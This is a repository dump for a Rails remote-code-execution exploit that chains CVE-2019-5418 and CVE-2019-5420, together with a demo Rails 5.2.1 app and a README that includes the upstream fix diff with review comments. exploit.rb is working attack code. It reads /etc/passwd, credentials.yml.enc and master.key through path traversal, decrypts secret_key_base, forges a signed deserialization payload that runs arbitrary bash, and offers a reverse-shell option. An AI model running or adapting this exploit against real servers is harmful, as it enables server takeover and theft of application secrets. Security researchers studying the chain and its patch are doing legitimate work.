66 | 67 | 68 | -------------------------------------------------------------------------------- /demo-5.2.1/public/404.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The page you were looking for doesn't exist (404) 5 | 6 | 55 | 56 | 57 | 58 | 59 |

The page you were looking for doesn't exist.


You may have mistyped the address or the page may have moved.


If you are the application owner check the logs for more information.

66 | 67 | 68 | -------------------------------------------------------------------------------- /demo-5.2.1/config/environments/test.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # The test environment is used exclusively to run your application's 5 | # test suite. You never need to work with it otherwise. Remember that 6 | # your test database is "scratch space" for the test suite and is wiped 7 | # and recreated between test runs. Don't rely on the data there! 8 | config.cache_classes = true 9 | 10 | # Do not eager load code on boot. This avoids loading your whole application 11 | # just for the purpose of running a single test. If you are using a tool that 12 | # preloads Rails for running tests, you may have to set it to true. 13 | config.eager_load = false 14 | 15 | # Configure public file server for tests with Cache-Control for performance. 16 | config.public_file_server.enabled = true 17 | config.public_file_server.headers = { 18 | 'Cache-Control' => "public, max-age=#{1.hour.to_i}" 19 | } 20 | 21 | # Show full error reports and disable caching. 22 | config.consider_all_requests_local = true 23 | config.action_controller.perform_caching = false 24 | 25 | # Raise exceptions instead of rendering exception templates. 26 | config.action_dispatch.show_exceptions = false 27 | 28 | # Disable request forgery protection in test environment. 29 | config.action_controller.allow_forgery_protection = false 30 | 31 | # Store uploaded files on the local file system in a temporary directory 32 | config.active_storage.service = :test 33 | 34 | config.action_mailer.perform_caching = false 35 | 36 | # Tell Action Mailer not to deliver emails to the real world. 37 | # The :test delivery method accumulates sent emails in the 38 | # ActionMailer::Base.deliveries array. 
39 | config.action_mailer.delivery_method = :test 40 | 41 | # Print deprecation notices to the stderr. 42 | config.active_support.deprecation = :stderr 43 | 44 | # Raises error for missing translations 45 | # config.action_view.raise_on_missing_translations = true 46 | end 47 | -------------------------------------------------------------------------------- /demo-5.2.1/config/environments/development.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # In the development environment your application's code is reloaded on 5 | # every request. This slows down response time but is perfect for development 6 | # since you don't have to restart the web server when you make code changes. 7 | config.cache_classes = false 8 | 9 | # Do not eager load code on boot. 10 | config.eager_load = false 11 | 12 | # Show full error reports. 13 | config.consider_all_requests_local = true 14 | 15 | # Enable/disable caching. By default caching is disabled. 16 | # Run rails dev:cache to toggle caching. 17 | if Rails.root.join('tmp', 'caching-dev.txt').exist? 18 | config.action_controller.perform_caching = true 19 | 20 | config.cache_store = :memory_store 21 | config.public_file_server.headers = { 22 | 'Cache-Control' => "public, max-age=#{2.days.to_i}" 23 | } 24 | else 25 | config.action_controller.perform_caching = false 26 | 27 | config.cache_store = :null_store 28 | end 29 | 30 | # Store uploaded files on the local file system (see config/storage.yml for options) 31 | config.active_storage.service = :local 32 | 33 | # Don't care if the mailer can't send. 34 | config.action_mailer.raise_delivery_errors = false 35 | 36 | config.action_mailer.perform_caching = false 37 | 38 | # Print deprecation notices to the Rails logger. 
39 | config.active_support.deprecation = :log 40 | 41 | # Raise an error on page load if there are pending migrations. 42 | config.active_record.migration_error = :page_load 43 | 44 | # Highlight code that triggered database queries in logs. 45 | config.active_record.verbose_query_logs = true 46 | 47 | # Debug mode disables concatenation and preprocessing of assets. 48 | # This option may cause significant delays in view rendering with a large 49 | # number of complex assets. 50 | config.assets.debug = true 51 | 52 | # Suppress logger output for asset requests. 53 | config.assets.quiet = true 54 | 55 | # Raises error for missing translations 56 | # config.action_view.raise_on_missing_translations = true 57 | 58 | # Use an evented file watcher to asynchronously detect changes in source code, 59 | # routes, locales, etc. This feature depends on the listen gem. 60 | config.file_watcher = ActiveSupport::EventedFileUpdateChecker 61 | end 62 | -------------------------------------------------------------------------------- /demo-5.2.1/Gemfile: -------------------------------------------------------------------------------- 1 | source 'https://rubygems.org' 2 | git_source(:github) { |repo| "https://github.com/#{repo}.git" } 3 | 4 | ruby '2.5.1' 5 | 6 | # Bundle edge Rails instead: gem 'rails', github: 'rails/rails' 7 | gem 'rails', '= 5.2.1' 8 | # Use sqlite3 as the database for Active Record 9 | gem 'sqlite3', '~> 1.3.6' 10 | # Use Puma as the app server 11 | gem 'puma', '~> 3.11' 12 | # Use SCSS for stylesheets 13 | gem 'sass-rails', '~> 5.0' 14 | # Use Uglifier as compressor for JavaScript assets 15 | gem 'uglifier', '>= 1.3.0' 16 | # See https://github.com/rails/execjs#readme for more supported runtimes 17 | # gem 'mini_racer', platforms: :ruby 18 | 19 | # Use CoffeeScript for .coffee assets and views 20 | gem 'coffee-rails', '~> 4.2' 21 | # Turbolinks makes navigating your web application faster. 
Read more: https://github.com/turbolinks/turbolinks 22 | gem 'turbolinks', '~> 5' 23 | # Build JSON APIs with ease. Read more: https://github.com/rails/jbuilder 24 | gem 'jbuilder', '~> 2.5' 25 | # Use Redis adapter to run Action Cable in production 26 | # gem 'redis', '~> 4.0' 27 | # Use ActiveModel has_secure_password 28 | # gem 'bcrypt', '~> 3.1.7' 29 | 30 | # Use ActiveStorage variant 31 | # gem 'mini_magick', '~> 4.8' 32 | 33 | # Use Capistrano for deployment 34 | # gem 'capistrano-rails', group: :development 35 | 36 | # Reduces boot times through caching; required in config/boot.rb 37 | gem 'bootsnap', '>= 1.1.0', require: false 38 | 39 | group :development, :test do 40 | # Call 'byebug' anywhere in the code to stop execution and get a debugger console 41 | gem 'byebug', platforms: [:mri, :mingw, :x64_mingw] 42 | end 43 | 44 | group :development do 45 | # Access an interactive console on exception pages or by calling 'console' anywhere in the code. 46 | gem 'web-console', '>= 3.3.0' 47 | gem 'listen', '>= 3.0.5', '< 3.2' 48 | # Spring speeds up development by keeping your application running in the background. 
Read more: https://github.com/rails/spring 49 | gem 'spring' 50 | gem 'spring-watcher-listen', '~> 2.0.0' 51 | end 52 | 53 | group :test do 54 | # Adds support for Capybara system testing and selenium driver 55 | gem 'capybara', '>= 2.15' 56 | gem 'selenium-webdriver' 57 | # Easy installation and use of chromedriver to run system tests with Chrome 58 | gem 'chromedriver-helper' 59 | end 60 | 61 | # Windows does not include zoneinfo files, so bundle the tzinfo-data gem 62 | gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw, :jruby] 63 | -------------------------------------------------------------------------------- /demo-5.2.1/config/environments/production.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # Code is not reloaded between requests. 5 | config.cache_classes = false 6 | 7 | # Eager load code on boot. This eager loads most of Rails and 8 | # your application in memory, allowing both threaded web servers 9 | # and those relying on copy on write to perform better. 10 | # Rake tasks automatically ignore this option for performance. 11 | config.eager_load = true 12 | 13 | # Full error reports are disabled and caching is turned on. 14 | config.consider_all_requests_local = false 15 | config.action_controller.perform_caching = true 16 | 17 | # Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"] 18 | # or in config/master.key. This key is used to decrypt credentials (and other encrypted files). 19 | # config.require_master_key = true 20 | 21 | # Disable serving static files from the `/public` folder by default since 22 | # Apache or NGINX already handles this. 23 | config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present? 24 | 25 | # Compress JavaScripts and CSS. 
26 | config.assets.js_compressor = :uglifier 27 | # config.assets.css_compressor = :sass 28 | 29 | # Do not fallback to assets pipeline if a precompiled asset is missed. 30 | config.assets.compile = false 31 | 32 | # `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb 33 | 34 | # Enable serving of images, stylesheets, and JavaScripts from an asset server. 35 | # config.action_controller.asset_host = 'http://assets.example.com' 36 | 37 | # Specifies the header that your server uses for sending files. 38 | # config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache 39 | # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX 40 | 41 | # Store uploaded files on the local file system (see config/storage.yml for options) 42 | config.active_storage.service = :local 43 | 44 | # Mount Action Cable outside main process or domain 45 | # config.action_cable.mount_path = nil 46 | # config.action_cable.url = 'wss://example.com/cable' 47 | # config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ] 48 | 49 | # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies. 50 | # config.force_ssl = true 51 | 52 | # Use the lowest log level to ensure availability of diagnostic information 53 | # when problems arise. 54 | config.log_level = :debug 55 | 56 | # Prepend all log lines with the following tags. 57 | config.log_tags = [ :request_id ] 58 | 59 | # Use a different cache store in production. 60 | # config.cache_store = :mem_cache_store 61 | 62 | # Use a real queuing backend for Active Job (and separate queues per environment) 63 | # config.active_job.queue_adapter = :resque 64 | # config.active_job.queue_name_prefix = "demo-5_2_1_#{Rails.env}" 65 | 66 | config.action_mailer.perform_caching = false 67 | 68 | # Ignore bad email addresses and do not raise email delivery errors. 
69 | # Set this to true and configure the email server for immediate delivery to raise delivery errors. 70 | # config.action_mailer.raise_delivery_errors = false 71 | 72 | # Enable locale fallbacks for I18n (makes lookups for any locale fall back to 73 | # the I18n.default_locale when a translation cannot be found). 74 | config.i18n.fallbacks = true 75 | 76 | # Send deprecation notices to registered listeners. 77 | config.active_support.deprecation = :notify 78 | 79 | # Use default logging formatter so that PID and timestamp are not suppressed. 80 | config.log_formatter = ::Logger::Formatter.new 81 | 82 | # Use a different logger for distributed setups. 83 | # require 'syslog/logger' 84 | # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name') 85 | 86 | if ENV["RAILS_LOG_TO_STDOUT"].present? 87 | logger = ActiveSupport::Logger.new(STDOUT) 88 | logger.formatter = config.log_formatter 89 | config.logger = ActiveSupport::TaggedLogging.new(logger) 90 | end 91 | 92 | # Do not dump schema after migrations. 93 | config.active_record.dump_schema_after_migration = false 94 | end 95 | -------------------------------------------------------------------------------- /exploit.rb: -------------------------------------------------------------------------------- 1 | require 'erb' 2 | require "./demo-5.2.1/config/environment" 3 | require "base64" 4 | require 'net/http' 5 | 6 | $proxy_addr = '127.0.0.1' 7 | $proxy_port = 8080 8 | 9 | $remote = "http://172.18.0.3:3000" 10 | $ressource = "/demo" 11 | 12 | puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n" 13 | 14 | print "[+] Checking if vulnerable to CVE-2019-5418 => " 15 | uri = URI($remote + $ressource) 16 | req = Net::HTTP::Get.new(uri) 17 | req['Accept'] = "../../../../../../../../../../etc/passwd{{" 18 | res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| 19 | http.request(req) 20 | } 21 | if res.body.include? 
"root:x:0:0:root:" 22 | puts "\033[92mOK\033[0m" 23 | else 24 | puts "KO" 25 | abort 26 | end 27 | 28 | print "[+] Getting file => credentials.yml.enc => " 29 | path = "../../../../../../../../../../config/credentials.yml.enc{{" 30 | for $i in 0..9 31 | uri = URI($remote + $ressource) 32 | req = Net::HTTP::Get.new(uri) 33 | req['Accept'] = path[3..57] 34 | res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| 35 | http.request(req) 36 | } 37 | if res.code == "200" 38 | puts "\033[92mOK\033[0m" 39 | File.open("credentials.yml.enc", 'w') { |file| file.write(res.body) } 40 | break 41 | end 42 | path = path[3..57] 43 | $i +=1; 44 | end 45 | 46 | print "[+] Getting file => master.key => " 47 | path = "../../../../../../../../../../config/master.key{{" 48 | for $i in 0..9 49 | uri = URI($remote + $ressource) 50 | req = Net::HTTP::Get.new(uri) 51 | req['Accept'] = path[3..57] 52 | res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| 53 | http.request(req) 54 | } 55 | if res.code == "200" 56 | puts "\033[92mOK\033[0m" 57 | File.open("master.key", 'w') { |file| file.write(res.body) } 58 | break 59 | end 60 | path = path[3..57] 61 | $i +=1; 62 | end 63 | 64 | print "[+] Decrypt secret_key_base => " 65 | credentials_config_path = File.join("../", "credentials.yml.enc") 66 | credentials_key_path = File.join("../", "master.key") 67 | ENV["RAILS_MASTER_KEY"] = res.body 68 | credentials = ActiveSupport::EncryptedConfiguration.new( 69 | config_path: Rails.root.join(credentials_config_path), 70 | key_path: Rails.root.join(credentials_key_path), 71 | env_key: "RAILS_MASTER_KEY", 72 | raise_if_missing_key: true 73 | ) 74 | if credentials.secret_key_base != nil 75 | puts "\033[92mOK\033[0m" 76 | puts "" 77 | puts "secret_key_base": credentials.secret_key_base 78 | puts "" 79 | end 80 | 81 | puts "[+] Getting reflective command (R) or reverse shell (S) => " 82 | loop do 83 | begin 84 | input = [(print 'Select option R or S: '), 
gets.rstrip][1] 85 | if input == "R" 86 | puts "Reflective command selected" 87 | command = [(print "command (\033[92mreflected\033[0m): "), gets.rstrip][1] 88 | elsif input == "S" 89 | puts "Reverse shell selected" 90 | command = [(print "command (\033[92mnot reflected\033[0m): "), gets.rstrip][1] 91 | else 92 | puts "No option selected" 93 | abort 94 | end 95 | 96 | command_b64 = Base64.encode64(command) 97 | 98 | print "[+] Generating payload CVE-2019-5420 => " 99 | secret_key_base = credentials.secret_key_base 100 | key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000)) 101 | secret = key_generator.generate_key("ActiveStorage") 102 | verifier = ActiveSupport::MessageVerifier.new(secret) 103 | if input == "R" 104 | code = "system('bash','-c','" + command + " > /tmp/result.txt')" 105 | else 106 | code = "system('bash','-c','" + command + "')" 107 | end 108 | erb = ERB.allocate 109 | erb.instance_variable_set :@src, code 110 | erb.instance_variable_set :@filename, "1" 111 | erb.instance_variable_set :@lineno, 1 112 | dump_target = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result 113 | 114 | puts "\033[92mOK\033[0m" 115 | puts "" 116 | url = $remote + "/rails/active_storage/disk/" + verifier.generate(dump_target, purpose: :blob_key) + "/test" 117 | puts url 118 | puts "" 119 | 120 | print "[+] Sending request => " 121 | uri = URI(url) 122 | req = Net::HTTP::Get.new(uri) 123 | req['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 124 | res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| 125 | http.request(req) 126 | } 127 | if res.code == "500" 128 | puts "\033[92mOK\033[0m" 129 | else 130 | puts "KO" 131 | abort 132 | end 133 | 134 | if input == "R" 135 | print "[+] Getting result of command => " 136 | uri = URI($remote + $ressource) 137 | req = Net::HTTP::Get.new(uri) 138 | req['Accept'] = 
"../../../../../../../../../../tmp/result.txt{{" 139 | res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http| 140 | http.request(req) 141 | } 142 | if res.code == "200" 143 | puts "\033[92mOK\033[0m\n\n" 144 | puts res.body 145 | puts "\n" 146 | else 147 | puts "KO" 148 | abort 149 | end 150 | end 151 | 152 | rescue Exception => e 153 | puts "Exiting..." 154 | abort 155 | end 156 | end 157 | -------------------------------------------------------------------------------- /demo-5.2.1/Gemfile.lock: -------------------------------------------------------------------------------- 1 | GEM 2 | remote: https://rubygems.org/ 3 | specs: 4 | actioncable (5.2.1) 5 | actionpack (= 5.2.1) 6 | nio4r (~> 2.0) 7 | websocket-driver (>= 0.6.1) 8 | actionmailer (5.2.1) 9 | actionpack (= 5.2.1) 10 | actionview (= 5.2.1) 11 | activejob (= 5.2.1) 12 | mail (~> 2.5, >= 2.5.4) 13 | rails-dom-testing (~> 2.0) 14 | actionpack (5.2.1) 15 | actionview (= 5.2.1) 16 | activesupport (= 5.2.1) 17 | rack (~> 2.0) 18 | rack-test (>= 0.6.3) 19 | rails-dom-testing (~> 2.0) 20 | rails-html-sanitizer (~> 1.0, >= 1.0.2) 21 | actionview (5.2.1) 22 | activesupport (= 5.2.1) 23 | builder (~> 3.1) 24 | erubi (~> 1.4) 25 | rails-dom-testing (~> 2.0) 26 | rails-html-sanitizer (~> 1.0, >= 1.0.3) 27 | activejob (5.2.1) 28 | activesupport (= 5.2.1) 29 | globalid (>= 0.3.6) 30 | activemodel (5.2.1) 31 | activesupport (= 5.2.1) 32 | activerecord (5.2.1) 33 | activemodel (= 5.2.1) 34 | activesupport (= 5.2.1) 35 | arel (>= 9.0) 36 | activestorage (5.2.1) 37 | actionpack (= 5.2.1) 38 | activerecord (= 5.2.1) 39 | marcel (~> 0.3.1) 40 | activesupport (5.2.1) 41 | concurrent-ruby (~> 1.0, >= 1.0.2) 42 | i18n (>= 0.7, < 2) 43 | minitest (~> 5.1) 44 | tzinfo (~> 1.1) 45 | addressable (2.6.0) 46 | public_suffix (>= 2.0.2, < 4.0) 47 | archive-zip (0.12.0) 48 | io-like (~> 0.3.0) 49 | arel (9.0.0) 50 | bindex (0.5.0) 51 | bootsnap (1.4.1) 52 | msgpack (~> 1.0) 53 | builder (3.2.3) 54 | byebug 
(11.0.1) 55 | capybara (3.15.0) 56 | addressable 57 | mini_mime (>= 0.1.3) 58 | nokogiri (~> 1.8) 59 | rack (>= 1.6.0) 60 | rack-test (>= 0.6.3) 61 | regexp_parser (~> 1.2) 62 | xpath (~> 3.2) 63 | childprocess (0.9.0) 64 | ffi (~> 1.0, >= 1.0.11) 65 | chromedriver-helper (2.1.0) 66 | archive-zip (~> 0.10) 67 | nokogiri (~> 1.8) 68 | coffee-rails (4.2.2) 69 | coffee-script (>= 2.2.0) 70 | railties (>= 4.0.0) 71 | coffee-script (2.4.1) 72 | coffee-script-source 73 | execjs 74 | coffee-script-source (1.12.2) 75 | concurrent-ruby (1.1.5) 76 | crass (1.0.4) 77 | erubi (1.8.0) 78 | execjs (2.7.0) 79 | ffi (1.10.0) 80 | globalid (0.4.2) 81 | activesupport (>= 4.2.0) 82 | i18n (1.6.0) 83 | concurrent-ruby (~> 1.0) 84 | io-like (0.3.0) 85 | jbuilder (2.8.0) 86 | activesupport (>= 4.2.0) 87 | multi_json (>= 1.2) 88 | listen (3.1.5) 89 | rb-fsevent (~> 0.9, >= 0.9.4) 90 | rb-inotify (~> 0.9, >= 0.9.7) 91 | ruby_dep (~> 1.2) 92 | loofah (2.2.3) 93 | crass (~> 1.0.2) 94 | nokogiri (>= 1.5.9) 95 | mail (2.7.1) 96 | mini_mime (>= 0.1.1) 97 | marcel (0.3.3) 98 | mimemagic (~> 0.3.2) 99 | method_source (0.9.2) 100 | mimemagic (0.3.3) 101 | mini_mime (1.0.1) 102 | mini_portile2 (2.4.0) 103 | minitest (5.11.3) 104 | msgpack (1.2.9) 105 | multi_json (1.13.1) 106 | nio4r (2.3.1) 107 | nokogiri (1.10.1) 108 | mini_portile2 (~> 2.4.0) 109 | public_suffix (3.0.3) 110 | puma (3.12.1) 111 | rack (2.0.6) 112 | rack-test (1.1.0) 113 | rack (>= 1.0, < 3) 114 | rails (5.2.1) 115 | actioncable (= 5.2.1) 116 | actionmailer (= 5.2.1) 117 | actionpack (= 5.2.1) 118 | actionview (= 5.2.1) 119 | activejob (= 5.2.1) 120 | activemodel (= 5.2.1) 121 | activerecord (= 5.2.1) 122 | activestorage (= 5.2.1) 123 | activesupport (= 5.2.1) 124 | bundler (>= 1.3.0) 125 | railties (= 5.2.1) 126 | sprockets-rails (>= 2.0.0) 127 | rails-dom-testing (2.0.3) 128 | activesupport (>= 4.2.0) 129 | nokogiri (>= 1.6) 130 | rails-html-sanitizer (1.0.4) 131 | loofah (~> 2.2, >= 2.2.2) 132 | railties (5.2.1) 133 | 
actionpack (= 5.2.1) 134 | activesupport (= 5.2.1) 135 | method_source 136 | rake (>= 0.8.7) 137 | thor (>= 0.19.0, < 2.0) 138 | rake (12.3.2) 139 | rb-fsevent (0.10.3) 140 | rb-inotify (0.10.0) 141 | ffi (~> 1.0) 142 | regexp_parser (1.3.0) 143 | ruby_dep (1.5.0) 144 | rubyzip (1.2.2) 145 | sass (3.7.3) 146 | sass-listen (~> 4.0.0) 147 | sass-listen (4.0.0) 148 | rb-fsevent (~> 0.9, >= 0.9.4) 149 | rb-inotify (~> 0.9, >= 0.9.7) 150 | sass-rails (5.0.7) 151 | railties (>= 4.0.0, < 6) 152 | sass (~> 3.1) 153 | sprockets (>= 2.8, < 4.0) 154 | sprockets-rails (>= 2.0, < 4.0) 155 | tilt (>= 1.1, < 3) 156 | selenium-webdriver (3.141.0) 157 | childprocess (~> 0.5) 158 | rubyzip (~> 1.2, >= 1.2.2) 159 | spring (2.0.2) 160 | activesupport (>= 4.2) 161 | spring-watcher-listen (2.0.1) 162 | listen (>= 2.7, < 4.0) 163 | spring (>= 1.2, < 3.0) 164 | sprockets (3.7.2) 165 | concurrent-ruby (~> 1.0) 166 | rack (> 1, < 3) 167 | sprockets-rails (3.2.1) 168 | actionpack (>= 4.0) 169 | activesupport (>= 4.0) 170 | sprockets (>= 3.0.0) 171 | sqlite3 (1.3.13) 172 | thor (0.20.3) 173 | thread_safe (0.3.6) 174 | tilt (2.0.9) 175 | turbolinks (5.2.0) 176 | turbolinks-source (~> 5.2) 177 | turbolinks-source (5.2.0) 178 | tzinfo (1.2.5) 179 | thread_safe (~> 0.1) 180 | uglifier (4.1.20) 181 | execjs (>= 0.3.0, < 3) 182 | web-console (3.7.0) 183 | actionview (>= 5.0) 184 | activemodel (>= 5.0) 185 | bindex (>= 0.4.0) 186 | railties (>= 5.0) 187 | websocket-driver (0.7.0) 188 | websocket-extensions (>= 0.1.0) 189 | websocket-extensions (0.1.3) 190 | xpath (3.2.0) 191 | nokogiri (~> 1.8) 192 | 193 | PLATFORMS 194 | ruby 195 | 196 | DEPENDENCIES 197 | bootsnap (>= 1.1.0) 198 | byebug 199 | capybara (>= 2.15) 200 | chromedriver-helper 201 | coffee-rails (~> 4.2) 202 | jbuilder (~> 2.5) 203 | listen (>= 3.0.5, < 3.2) 204 | puma (~> 3.11) 205 | rails (= 5.2.1) 206 | sass-rails (~> 5.0) 207 | selenium-webdriver 208 | spring 209 | spring-watcher-listen (~> 2.0.0) 210 | sqlite3 (~> 1.3.6) 211 | 
turbolinks (~> 5) 212 | tzinfo-data 213 | uglifier (>= 1.3.0) 214 | web-console (>= 3.3.0) 215 | 216 | RUBY VERSION 217 | ruby 2.5.1p57 218 | 219 | BUNDLED WITH 220 | 1.16.1 221 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Rails-doubletap-exploit 2 | 3 | RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420) 4 | 5 | ![capture d'écran](https://user-images.githubusercontent.com/5891788/54860812-dc7cc480-4d1f-11e9-8886-6d9c6a05d648.png) 6 | 7 | **Technical Analysis**: 8 | - CVE-2019-5418 - https://github.com/mpgn/CVE-2019-5418 9 | - CVE-2019-5420 - https://hackerone.com/reports/473888 10 | 11 | 12 | **Security Advisory**: 13 | - CVE-2019-5418 - https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q 14 | - CVE-2019-5420 - https://groups.google.com/forum/#!searchin/rubyonrails-security/CVE-2019-5420 15 | 16 | --- 17 | 18 | ### Exploit 19 | 20 | 1. The exploit checks whether the Rails application is vulnerable to **CVE-2019-5418** 21 | 2. It then retrieves the content of the files `credentials.yml.enc` and `master.key` 22 | 3. It decrypts *credentials.yml.enc* and reads the **secret_key_base** value 23 | 4. It crafts a request to the resource `/rails/active_storage/disk/:encoded_key/*filename(.:format)` => **CVE-2019-5420** 24 | 5. It sends the request to the vulnerable server 25 | 6. The code is executed on the server 26 | 27 | ![capture d'écran_1](https://user-images.githubusercontent.com/5891788/54864755-f2a87600-4d5b-11e9-9eab-8402ea52c978.png) 28 | 29 | **Mitigations** 30 | 31 | - You may notice that caching is disabled in this exploit setup, but a race condition can be used to retrieve the two files: https://gist.github.com/snyff/04c3463845480632a1fe192308c31439#file-race_condition-sh 32 | 33 | --- 34 | Fix of **CVE-2019-5420** 35 | 36 | ```diff 37 |
From 7f5ccda38bfecbe0bf00f15e5b8f5e40d52ab3f1 Mon Sep 17 00:00:00 2001 38 | From: Aaron Patterson 39 | Date: Sun, 10 Mar 2019 16:37:46 -0700 40 | Subject: [PATCH] Fix possible dev mode RCE 41 | 42 | If the secret_key_base is nil in dev or test generate a key from random 43 | bytes and store it in a tmp file. This prevents the app developers from 44 | having to share / checkin the secret key for dev / test but also 45 | maintains a key between app restarts in dev/test. 46 | 47 | [CVE-2019-5420] 48 | 49 | Co-Authored-By: eileencodes 50 | Co-Authored-By: John Hawthorn 51 | --- 52 | .../middleware/session/cookie_store.rb | 7 +++--- 53 | railties/lib/rails/application.rb | 19 ++++++++++++++-- 54 | .../test/application/configuration_test.rb | 22 ++++++++++++++++++- 55 | railties/test/isolation/abstract_unit.rb | 1 + 56 | 4 files changed, 43 insertions(+), 6 deletions(-) 57 | 58 | diff --git a/actionpack/lib/action_dispatch/middleware/session/cookie_store.rb b/actionpack/lib/action_dispatch/middleware/session/cookie_store.rb 59 | index 4ea96196d3..b7475d3682 100644 60 | --- a/actionpack/lib/action_dispatch/middleware/session/cookie_store.rb 61 | +++ b/actionpack/lib/action_dispatch/middleware/session/cookie_store.rb 62 | 
@@ -29,9 +29,10 @@
63 | #
64 | # Rails.application.config.session_store :cookie_store, key: '_your_app_session'
65 | #
66 | - # By default, your secret key base is derived from your application name in
67 | - # the test and development environments. In all other environments, it is stored
68 | - # encrypted in the config/credentials.yml.enc file.
69 | + # In the development and test environments your application's secret key base is
70 | + # generated by Rails and stored in a temporary file in tmp/development_secret.txt.
71 | + # In all other environments, it is stored encrypted in the
72 | + # config/credentials.yml.enc file.
73 | #
74 | # If your application was not updated to Rails 5.2 defaults, the secret_key_base
75 | # will be found in the old config/secrets.yml file.
76 | diff --git a/railties/lib/rails/application.rb b/railties/lib/rails/application.rb
77 | index e346d5cc3a..6a30e8cfa0 100644
78 | --- a/railties/lib/rails/application.rb
79 | +++ b/railties/lib/rails/application.rb
80 | @@ -426,8 +426,8 @@ def secrets=(secrets) #:nodoc:
81 | # then credentials.secret_key_base, and finally secrets.secret_key_base. For most applications,
82 | # the correct place to store it is in the encrypted credentials file.
83 | def secret_key_base
84 | - if Rails.env.test? || Rails.env.development?
85 | - secrets.secret_key_base || Digest::MD5.hexdigest(self.class.name)
86 | + if Rails.env.development? || Rails.env.test?
87 | + secrets.secret_key_base ||= generate_development_secret
88 | else
89 | validate_secret_key_base(
90 | ENV["SECRET_KEY_BASE"] || credentials.secret_key_base || secrets.secret_key_base
91 |
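Review bot: The `||=` on the new line `secrets.secret_key_base ||= generate_development_secret` only falls through for nil or false, so an empty string stored in secrets is kept as the development key base, while the production branch sends the same value through validate_secret_key_base, whose blank-rejecting behaviour the existing test "raises when secret_key_base is blank" relies on. Consider `secrets.secret_key_base = generate_development_secret if secrets.secret_key_base.blank?` so a blank value is treated the same way in both environments. Note also that generate_development_secret repeats the nil check internally (next hunk of this file), so one of the two guards is redundant. The body of secret_key_base continues outside the hunk.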
@@ -588,6 +588,21 @@ def validate_secret_key_base(secret_key_base)
92 |
93 | private
94 |
95 | + def generate_development_secret
96 | + if secrets.secret_key_base.nil?
97 | + key_file = Rails.root.join("tmp/development_secret.txt")
98 | +
99 | + if !File.exist?(key_file)
100 | + random_key = SecureRandom.hex(64)
101 | + File.binwrite(key_file, random_key)
102 | + end
103 | +
104 | + secrets.secret_key_base = File.binread(key_file)
105 | + end
106 | +
107 | + secrets.secret_key_base
108 | + end
109 | +
110 | def build_request(env)
111 | req = super
112 | env["ORIGINAL_FULLPATH"] = req.fullpath
113 | diff --git a/railties/test/application/configuration_test.rb b/railties/test/application/configuration_test.rb
114 | index 293a1a7dbd..68c2199aba 100644
115 | --- a/railties/test/application/configuration_test.rb
116 | +++ b/railties/test/application/configuration_test.rb
117 | @@ -513,6 +513,27 @@ def index
118 | end
119 |
120 |
121 | + test "application will generate secret_key_base in tmp file if blank in development" do
122 | + app_file "config/initializers/secret_token.rb", <<-RUBY
123 | + Rails.application.credentials.secret_key_base = nil
124 | + RUBY
125 | +
126 | + app "development"
127 | +
128 | + assert_not_nil app.secrets.secret_key_base
129 | + assert File.exist?(app_path("tmp/development_secret.txt"))
130 | + end
131 | +
132 | + test "application will not generate secret_key_base in tmp file if blank in production" do
133 | + app_file "config/initializers/secret_token.rb", <<-RUBY
134 | + Rails.application.credentials.secret_key_base = nil
135 | + RUBY
136 | +
137 | + assert_raises ArgumentError do
138 | + app "production"
139 | + end
140 | + end
141 | +
142 | test "raises when secret_key_base is blank" do
143 | app_file "config/initializers/secret_token.rb", <<-RUBY
144 | Rails.application.credentials.secret_key_base = nil
145 |
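Review bot: `File.binwrite(key_file, random_key)` creates tmp/development_secret.txt with the process umask, so on a shared development host the generated key base is usually readable by other local users; writing it owner-only, `File.binwrite(key_file, random_key, perm: 0o600)`, keeps the file as private as the key it holds. The `File.exist?` check followed by a separate write is also not atomic: two app processes started together (a server and a console, say) can each generate a different key, the later write wins on disk, and the other process keeps its own in-memory value until restart; opening with `File::CREAT | File::EXCL` and rereading on EEXIST would close that window, though for a development-only secret that may be an accepted trade-off. A short comment stating the intent would help the next reader, for example `# Dev/test only: persist a random key base across restarts so no secret has to be checked into the repo.`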
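Review bot: The new test "application will not generate secret_key_base in tmp file if blank in production" asserts only that booting raises ArgumentError and never checks the property its name promises. Add `assert_not File.exist?(app_path("tmp/development_secret.txt"))` after the assert_raises block so a regression that writes the file before validating the key would be caught. The development test could likewise tie the two assertions together, `assert_equal File.binread(app_path("tmp/development_secret.txt")), app.secrets.secret_key_base`, so it verifies that the value actually in use is the persisted one.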
@@ -550,7 +571,6 @@ def index
146 |
147 | test "application verifier can build different verifiers" do
148 | make_basic_app do |application|
149 | - application.credentials.secret_key_base = "b3c631c314c0bbca50c1b2843150fe33"
150 | application.config.session_store :disabled
151 | end
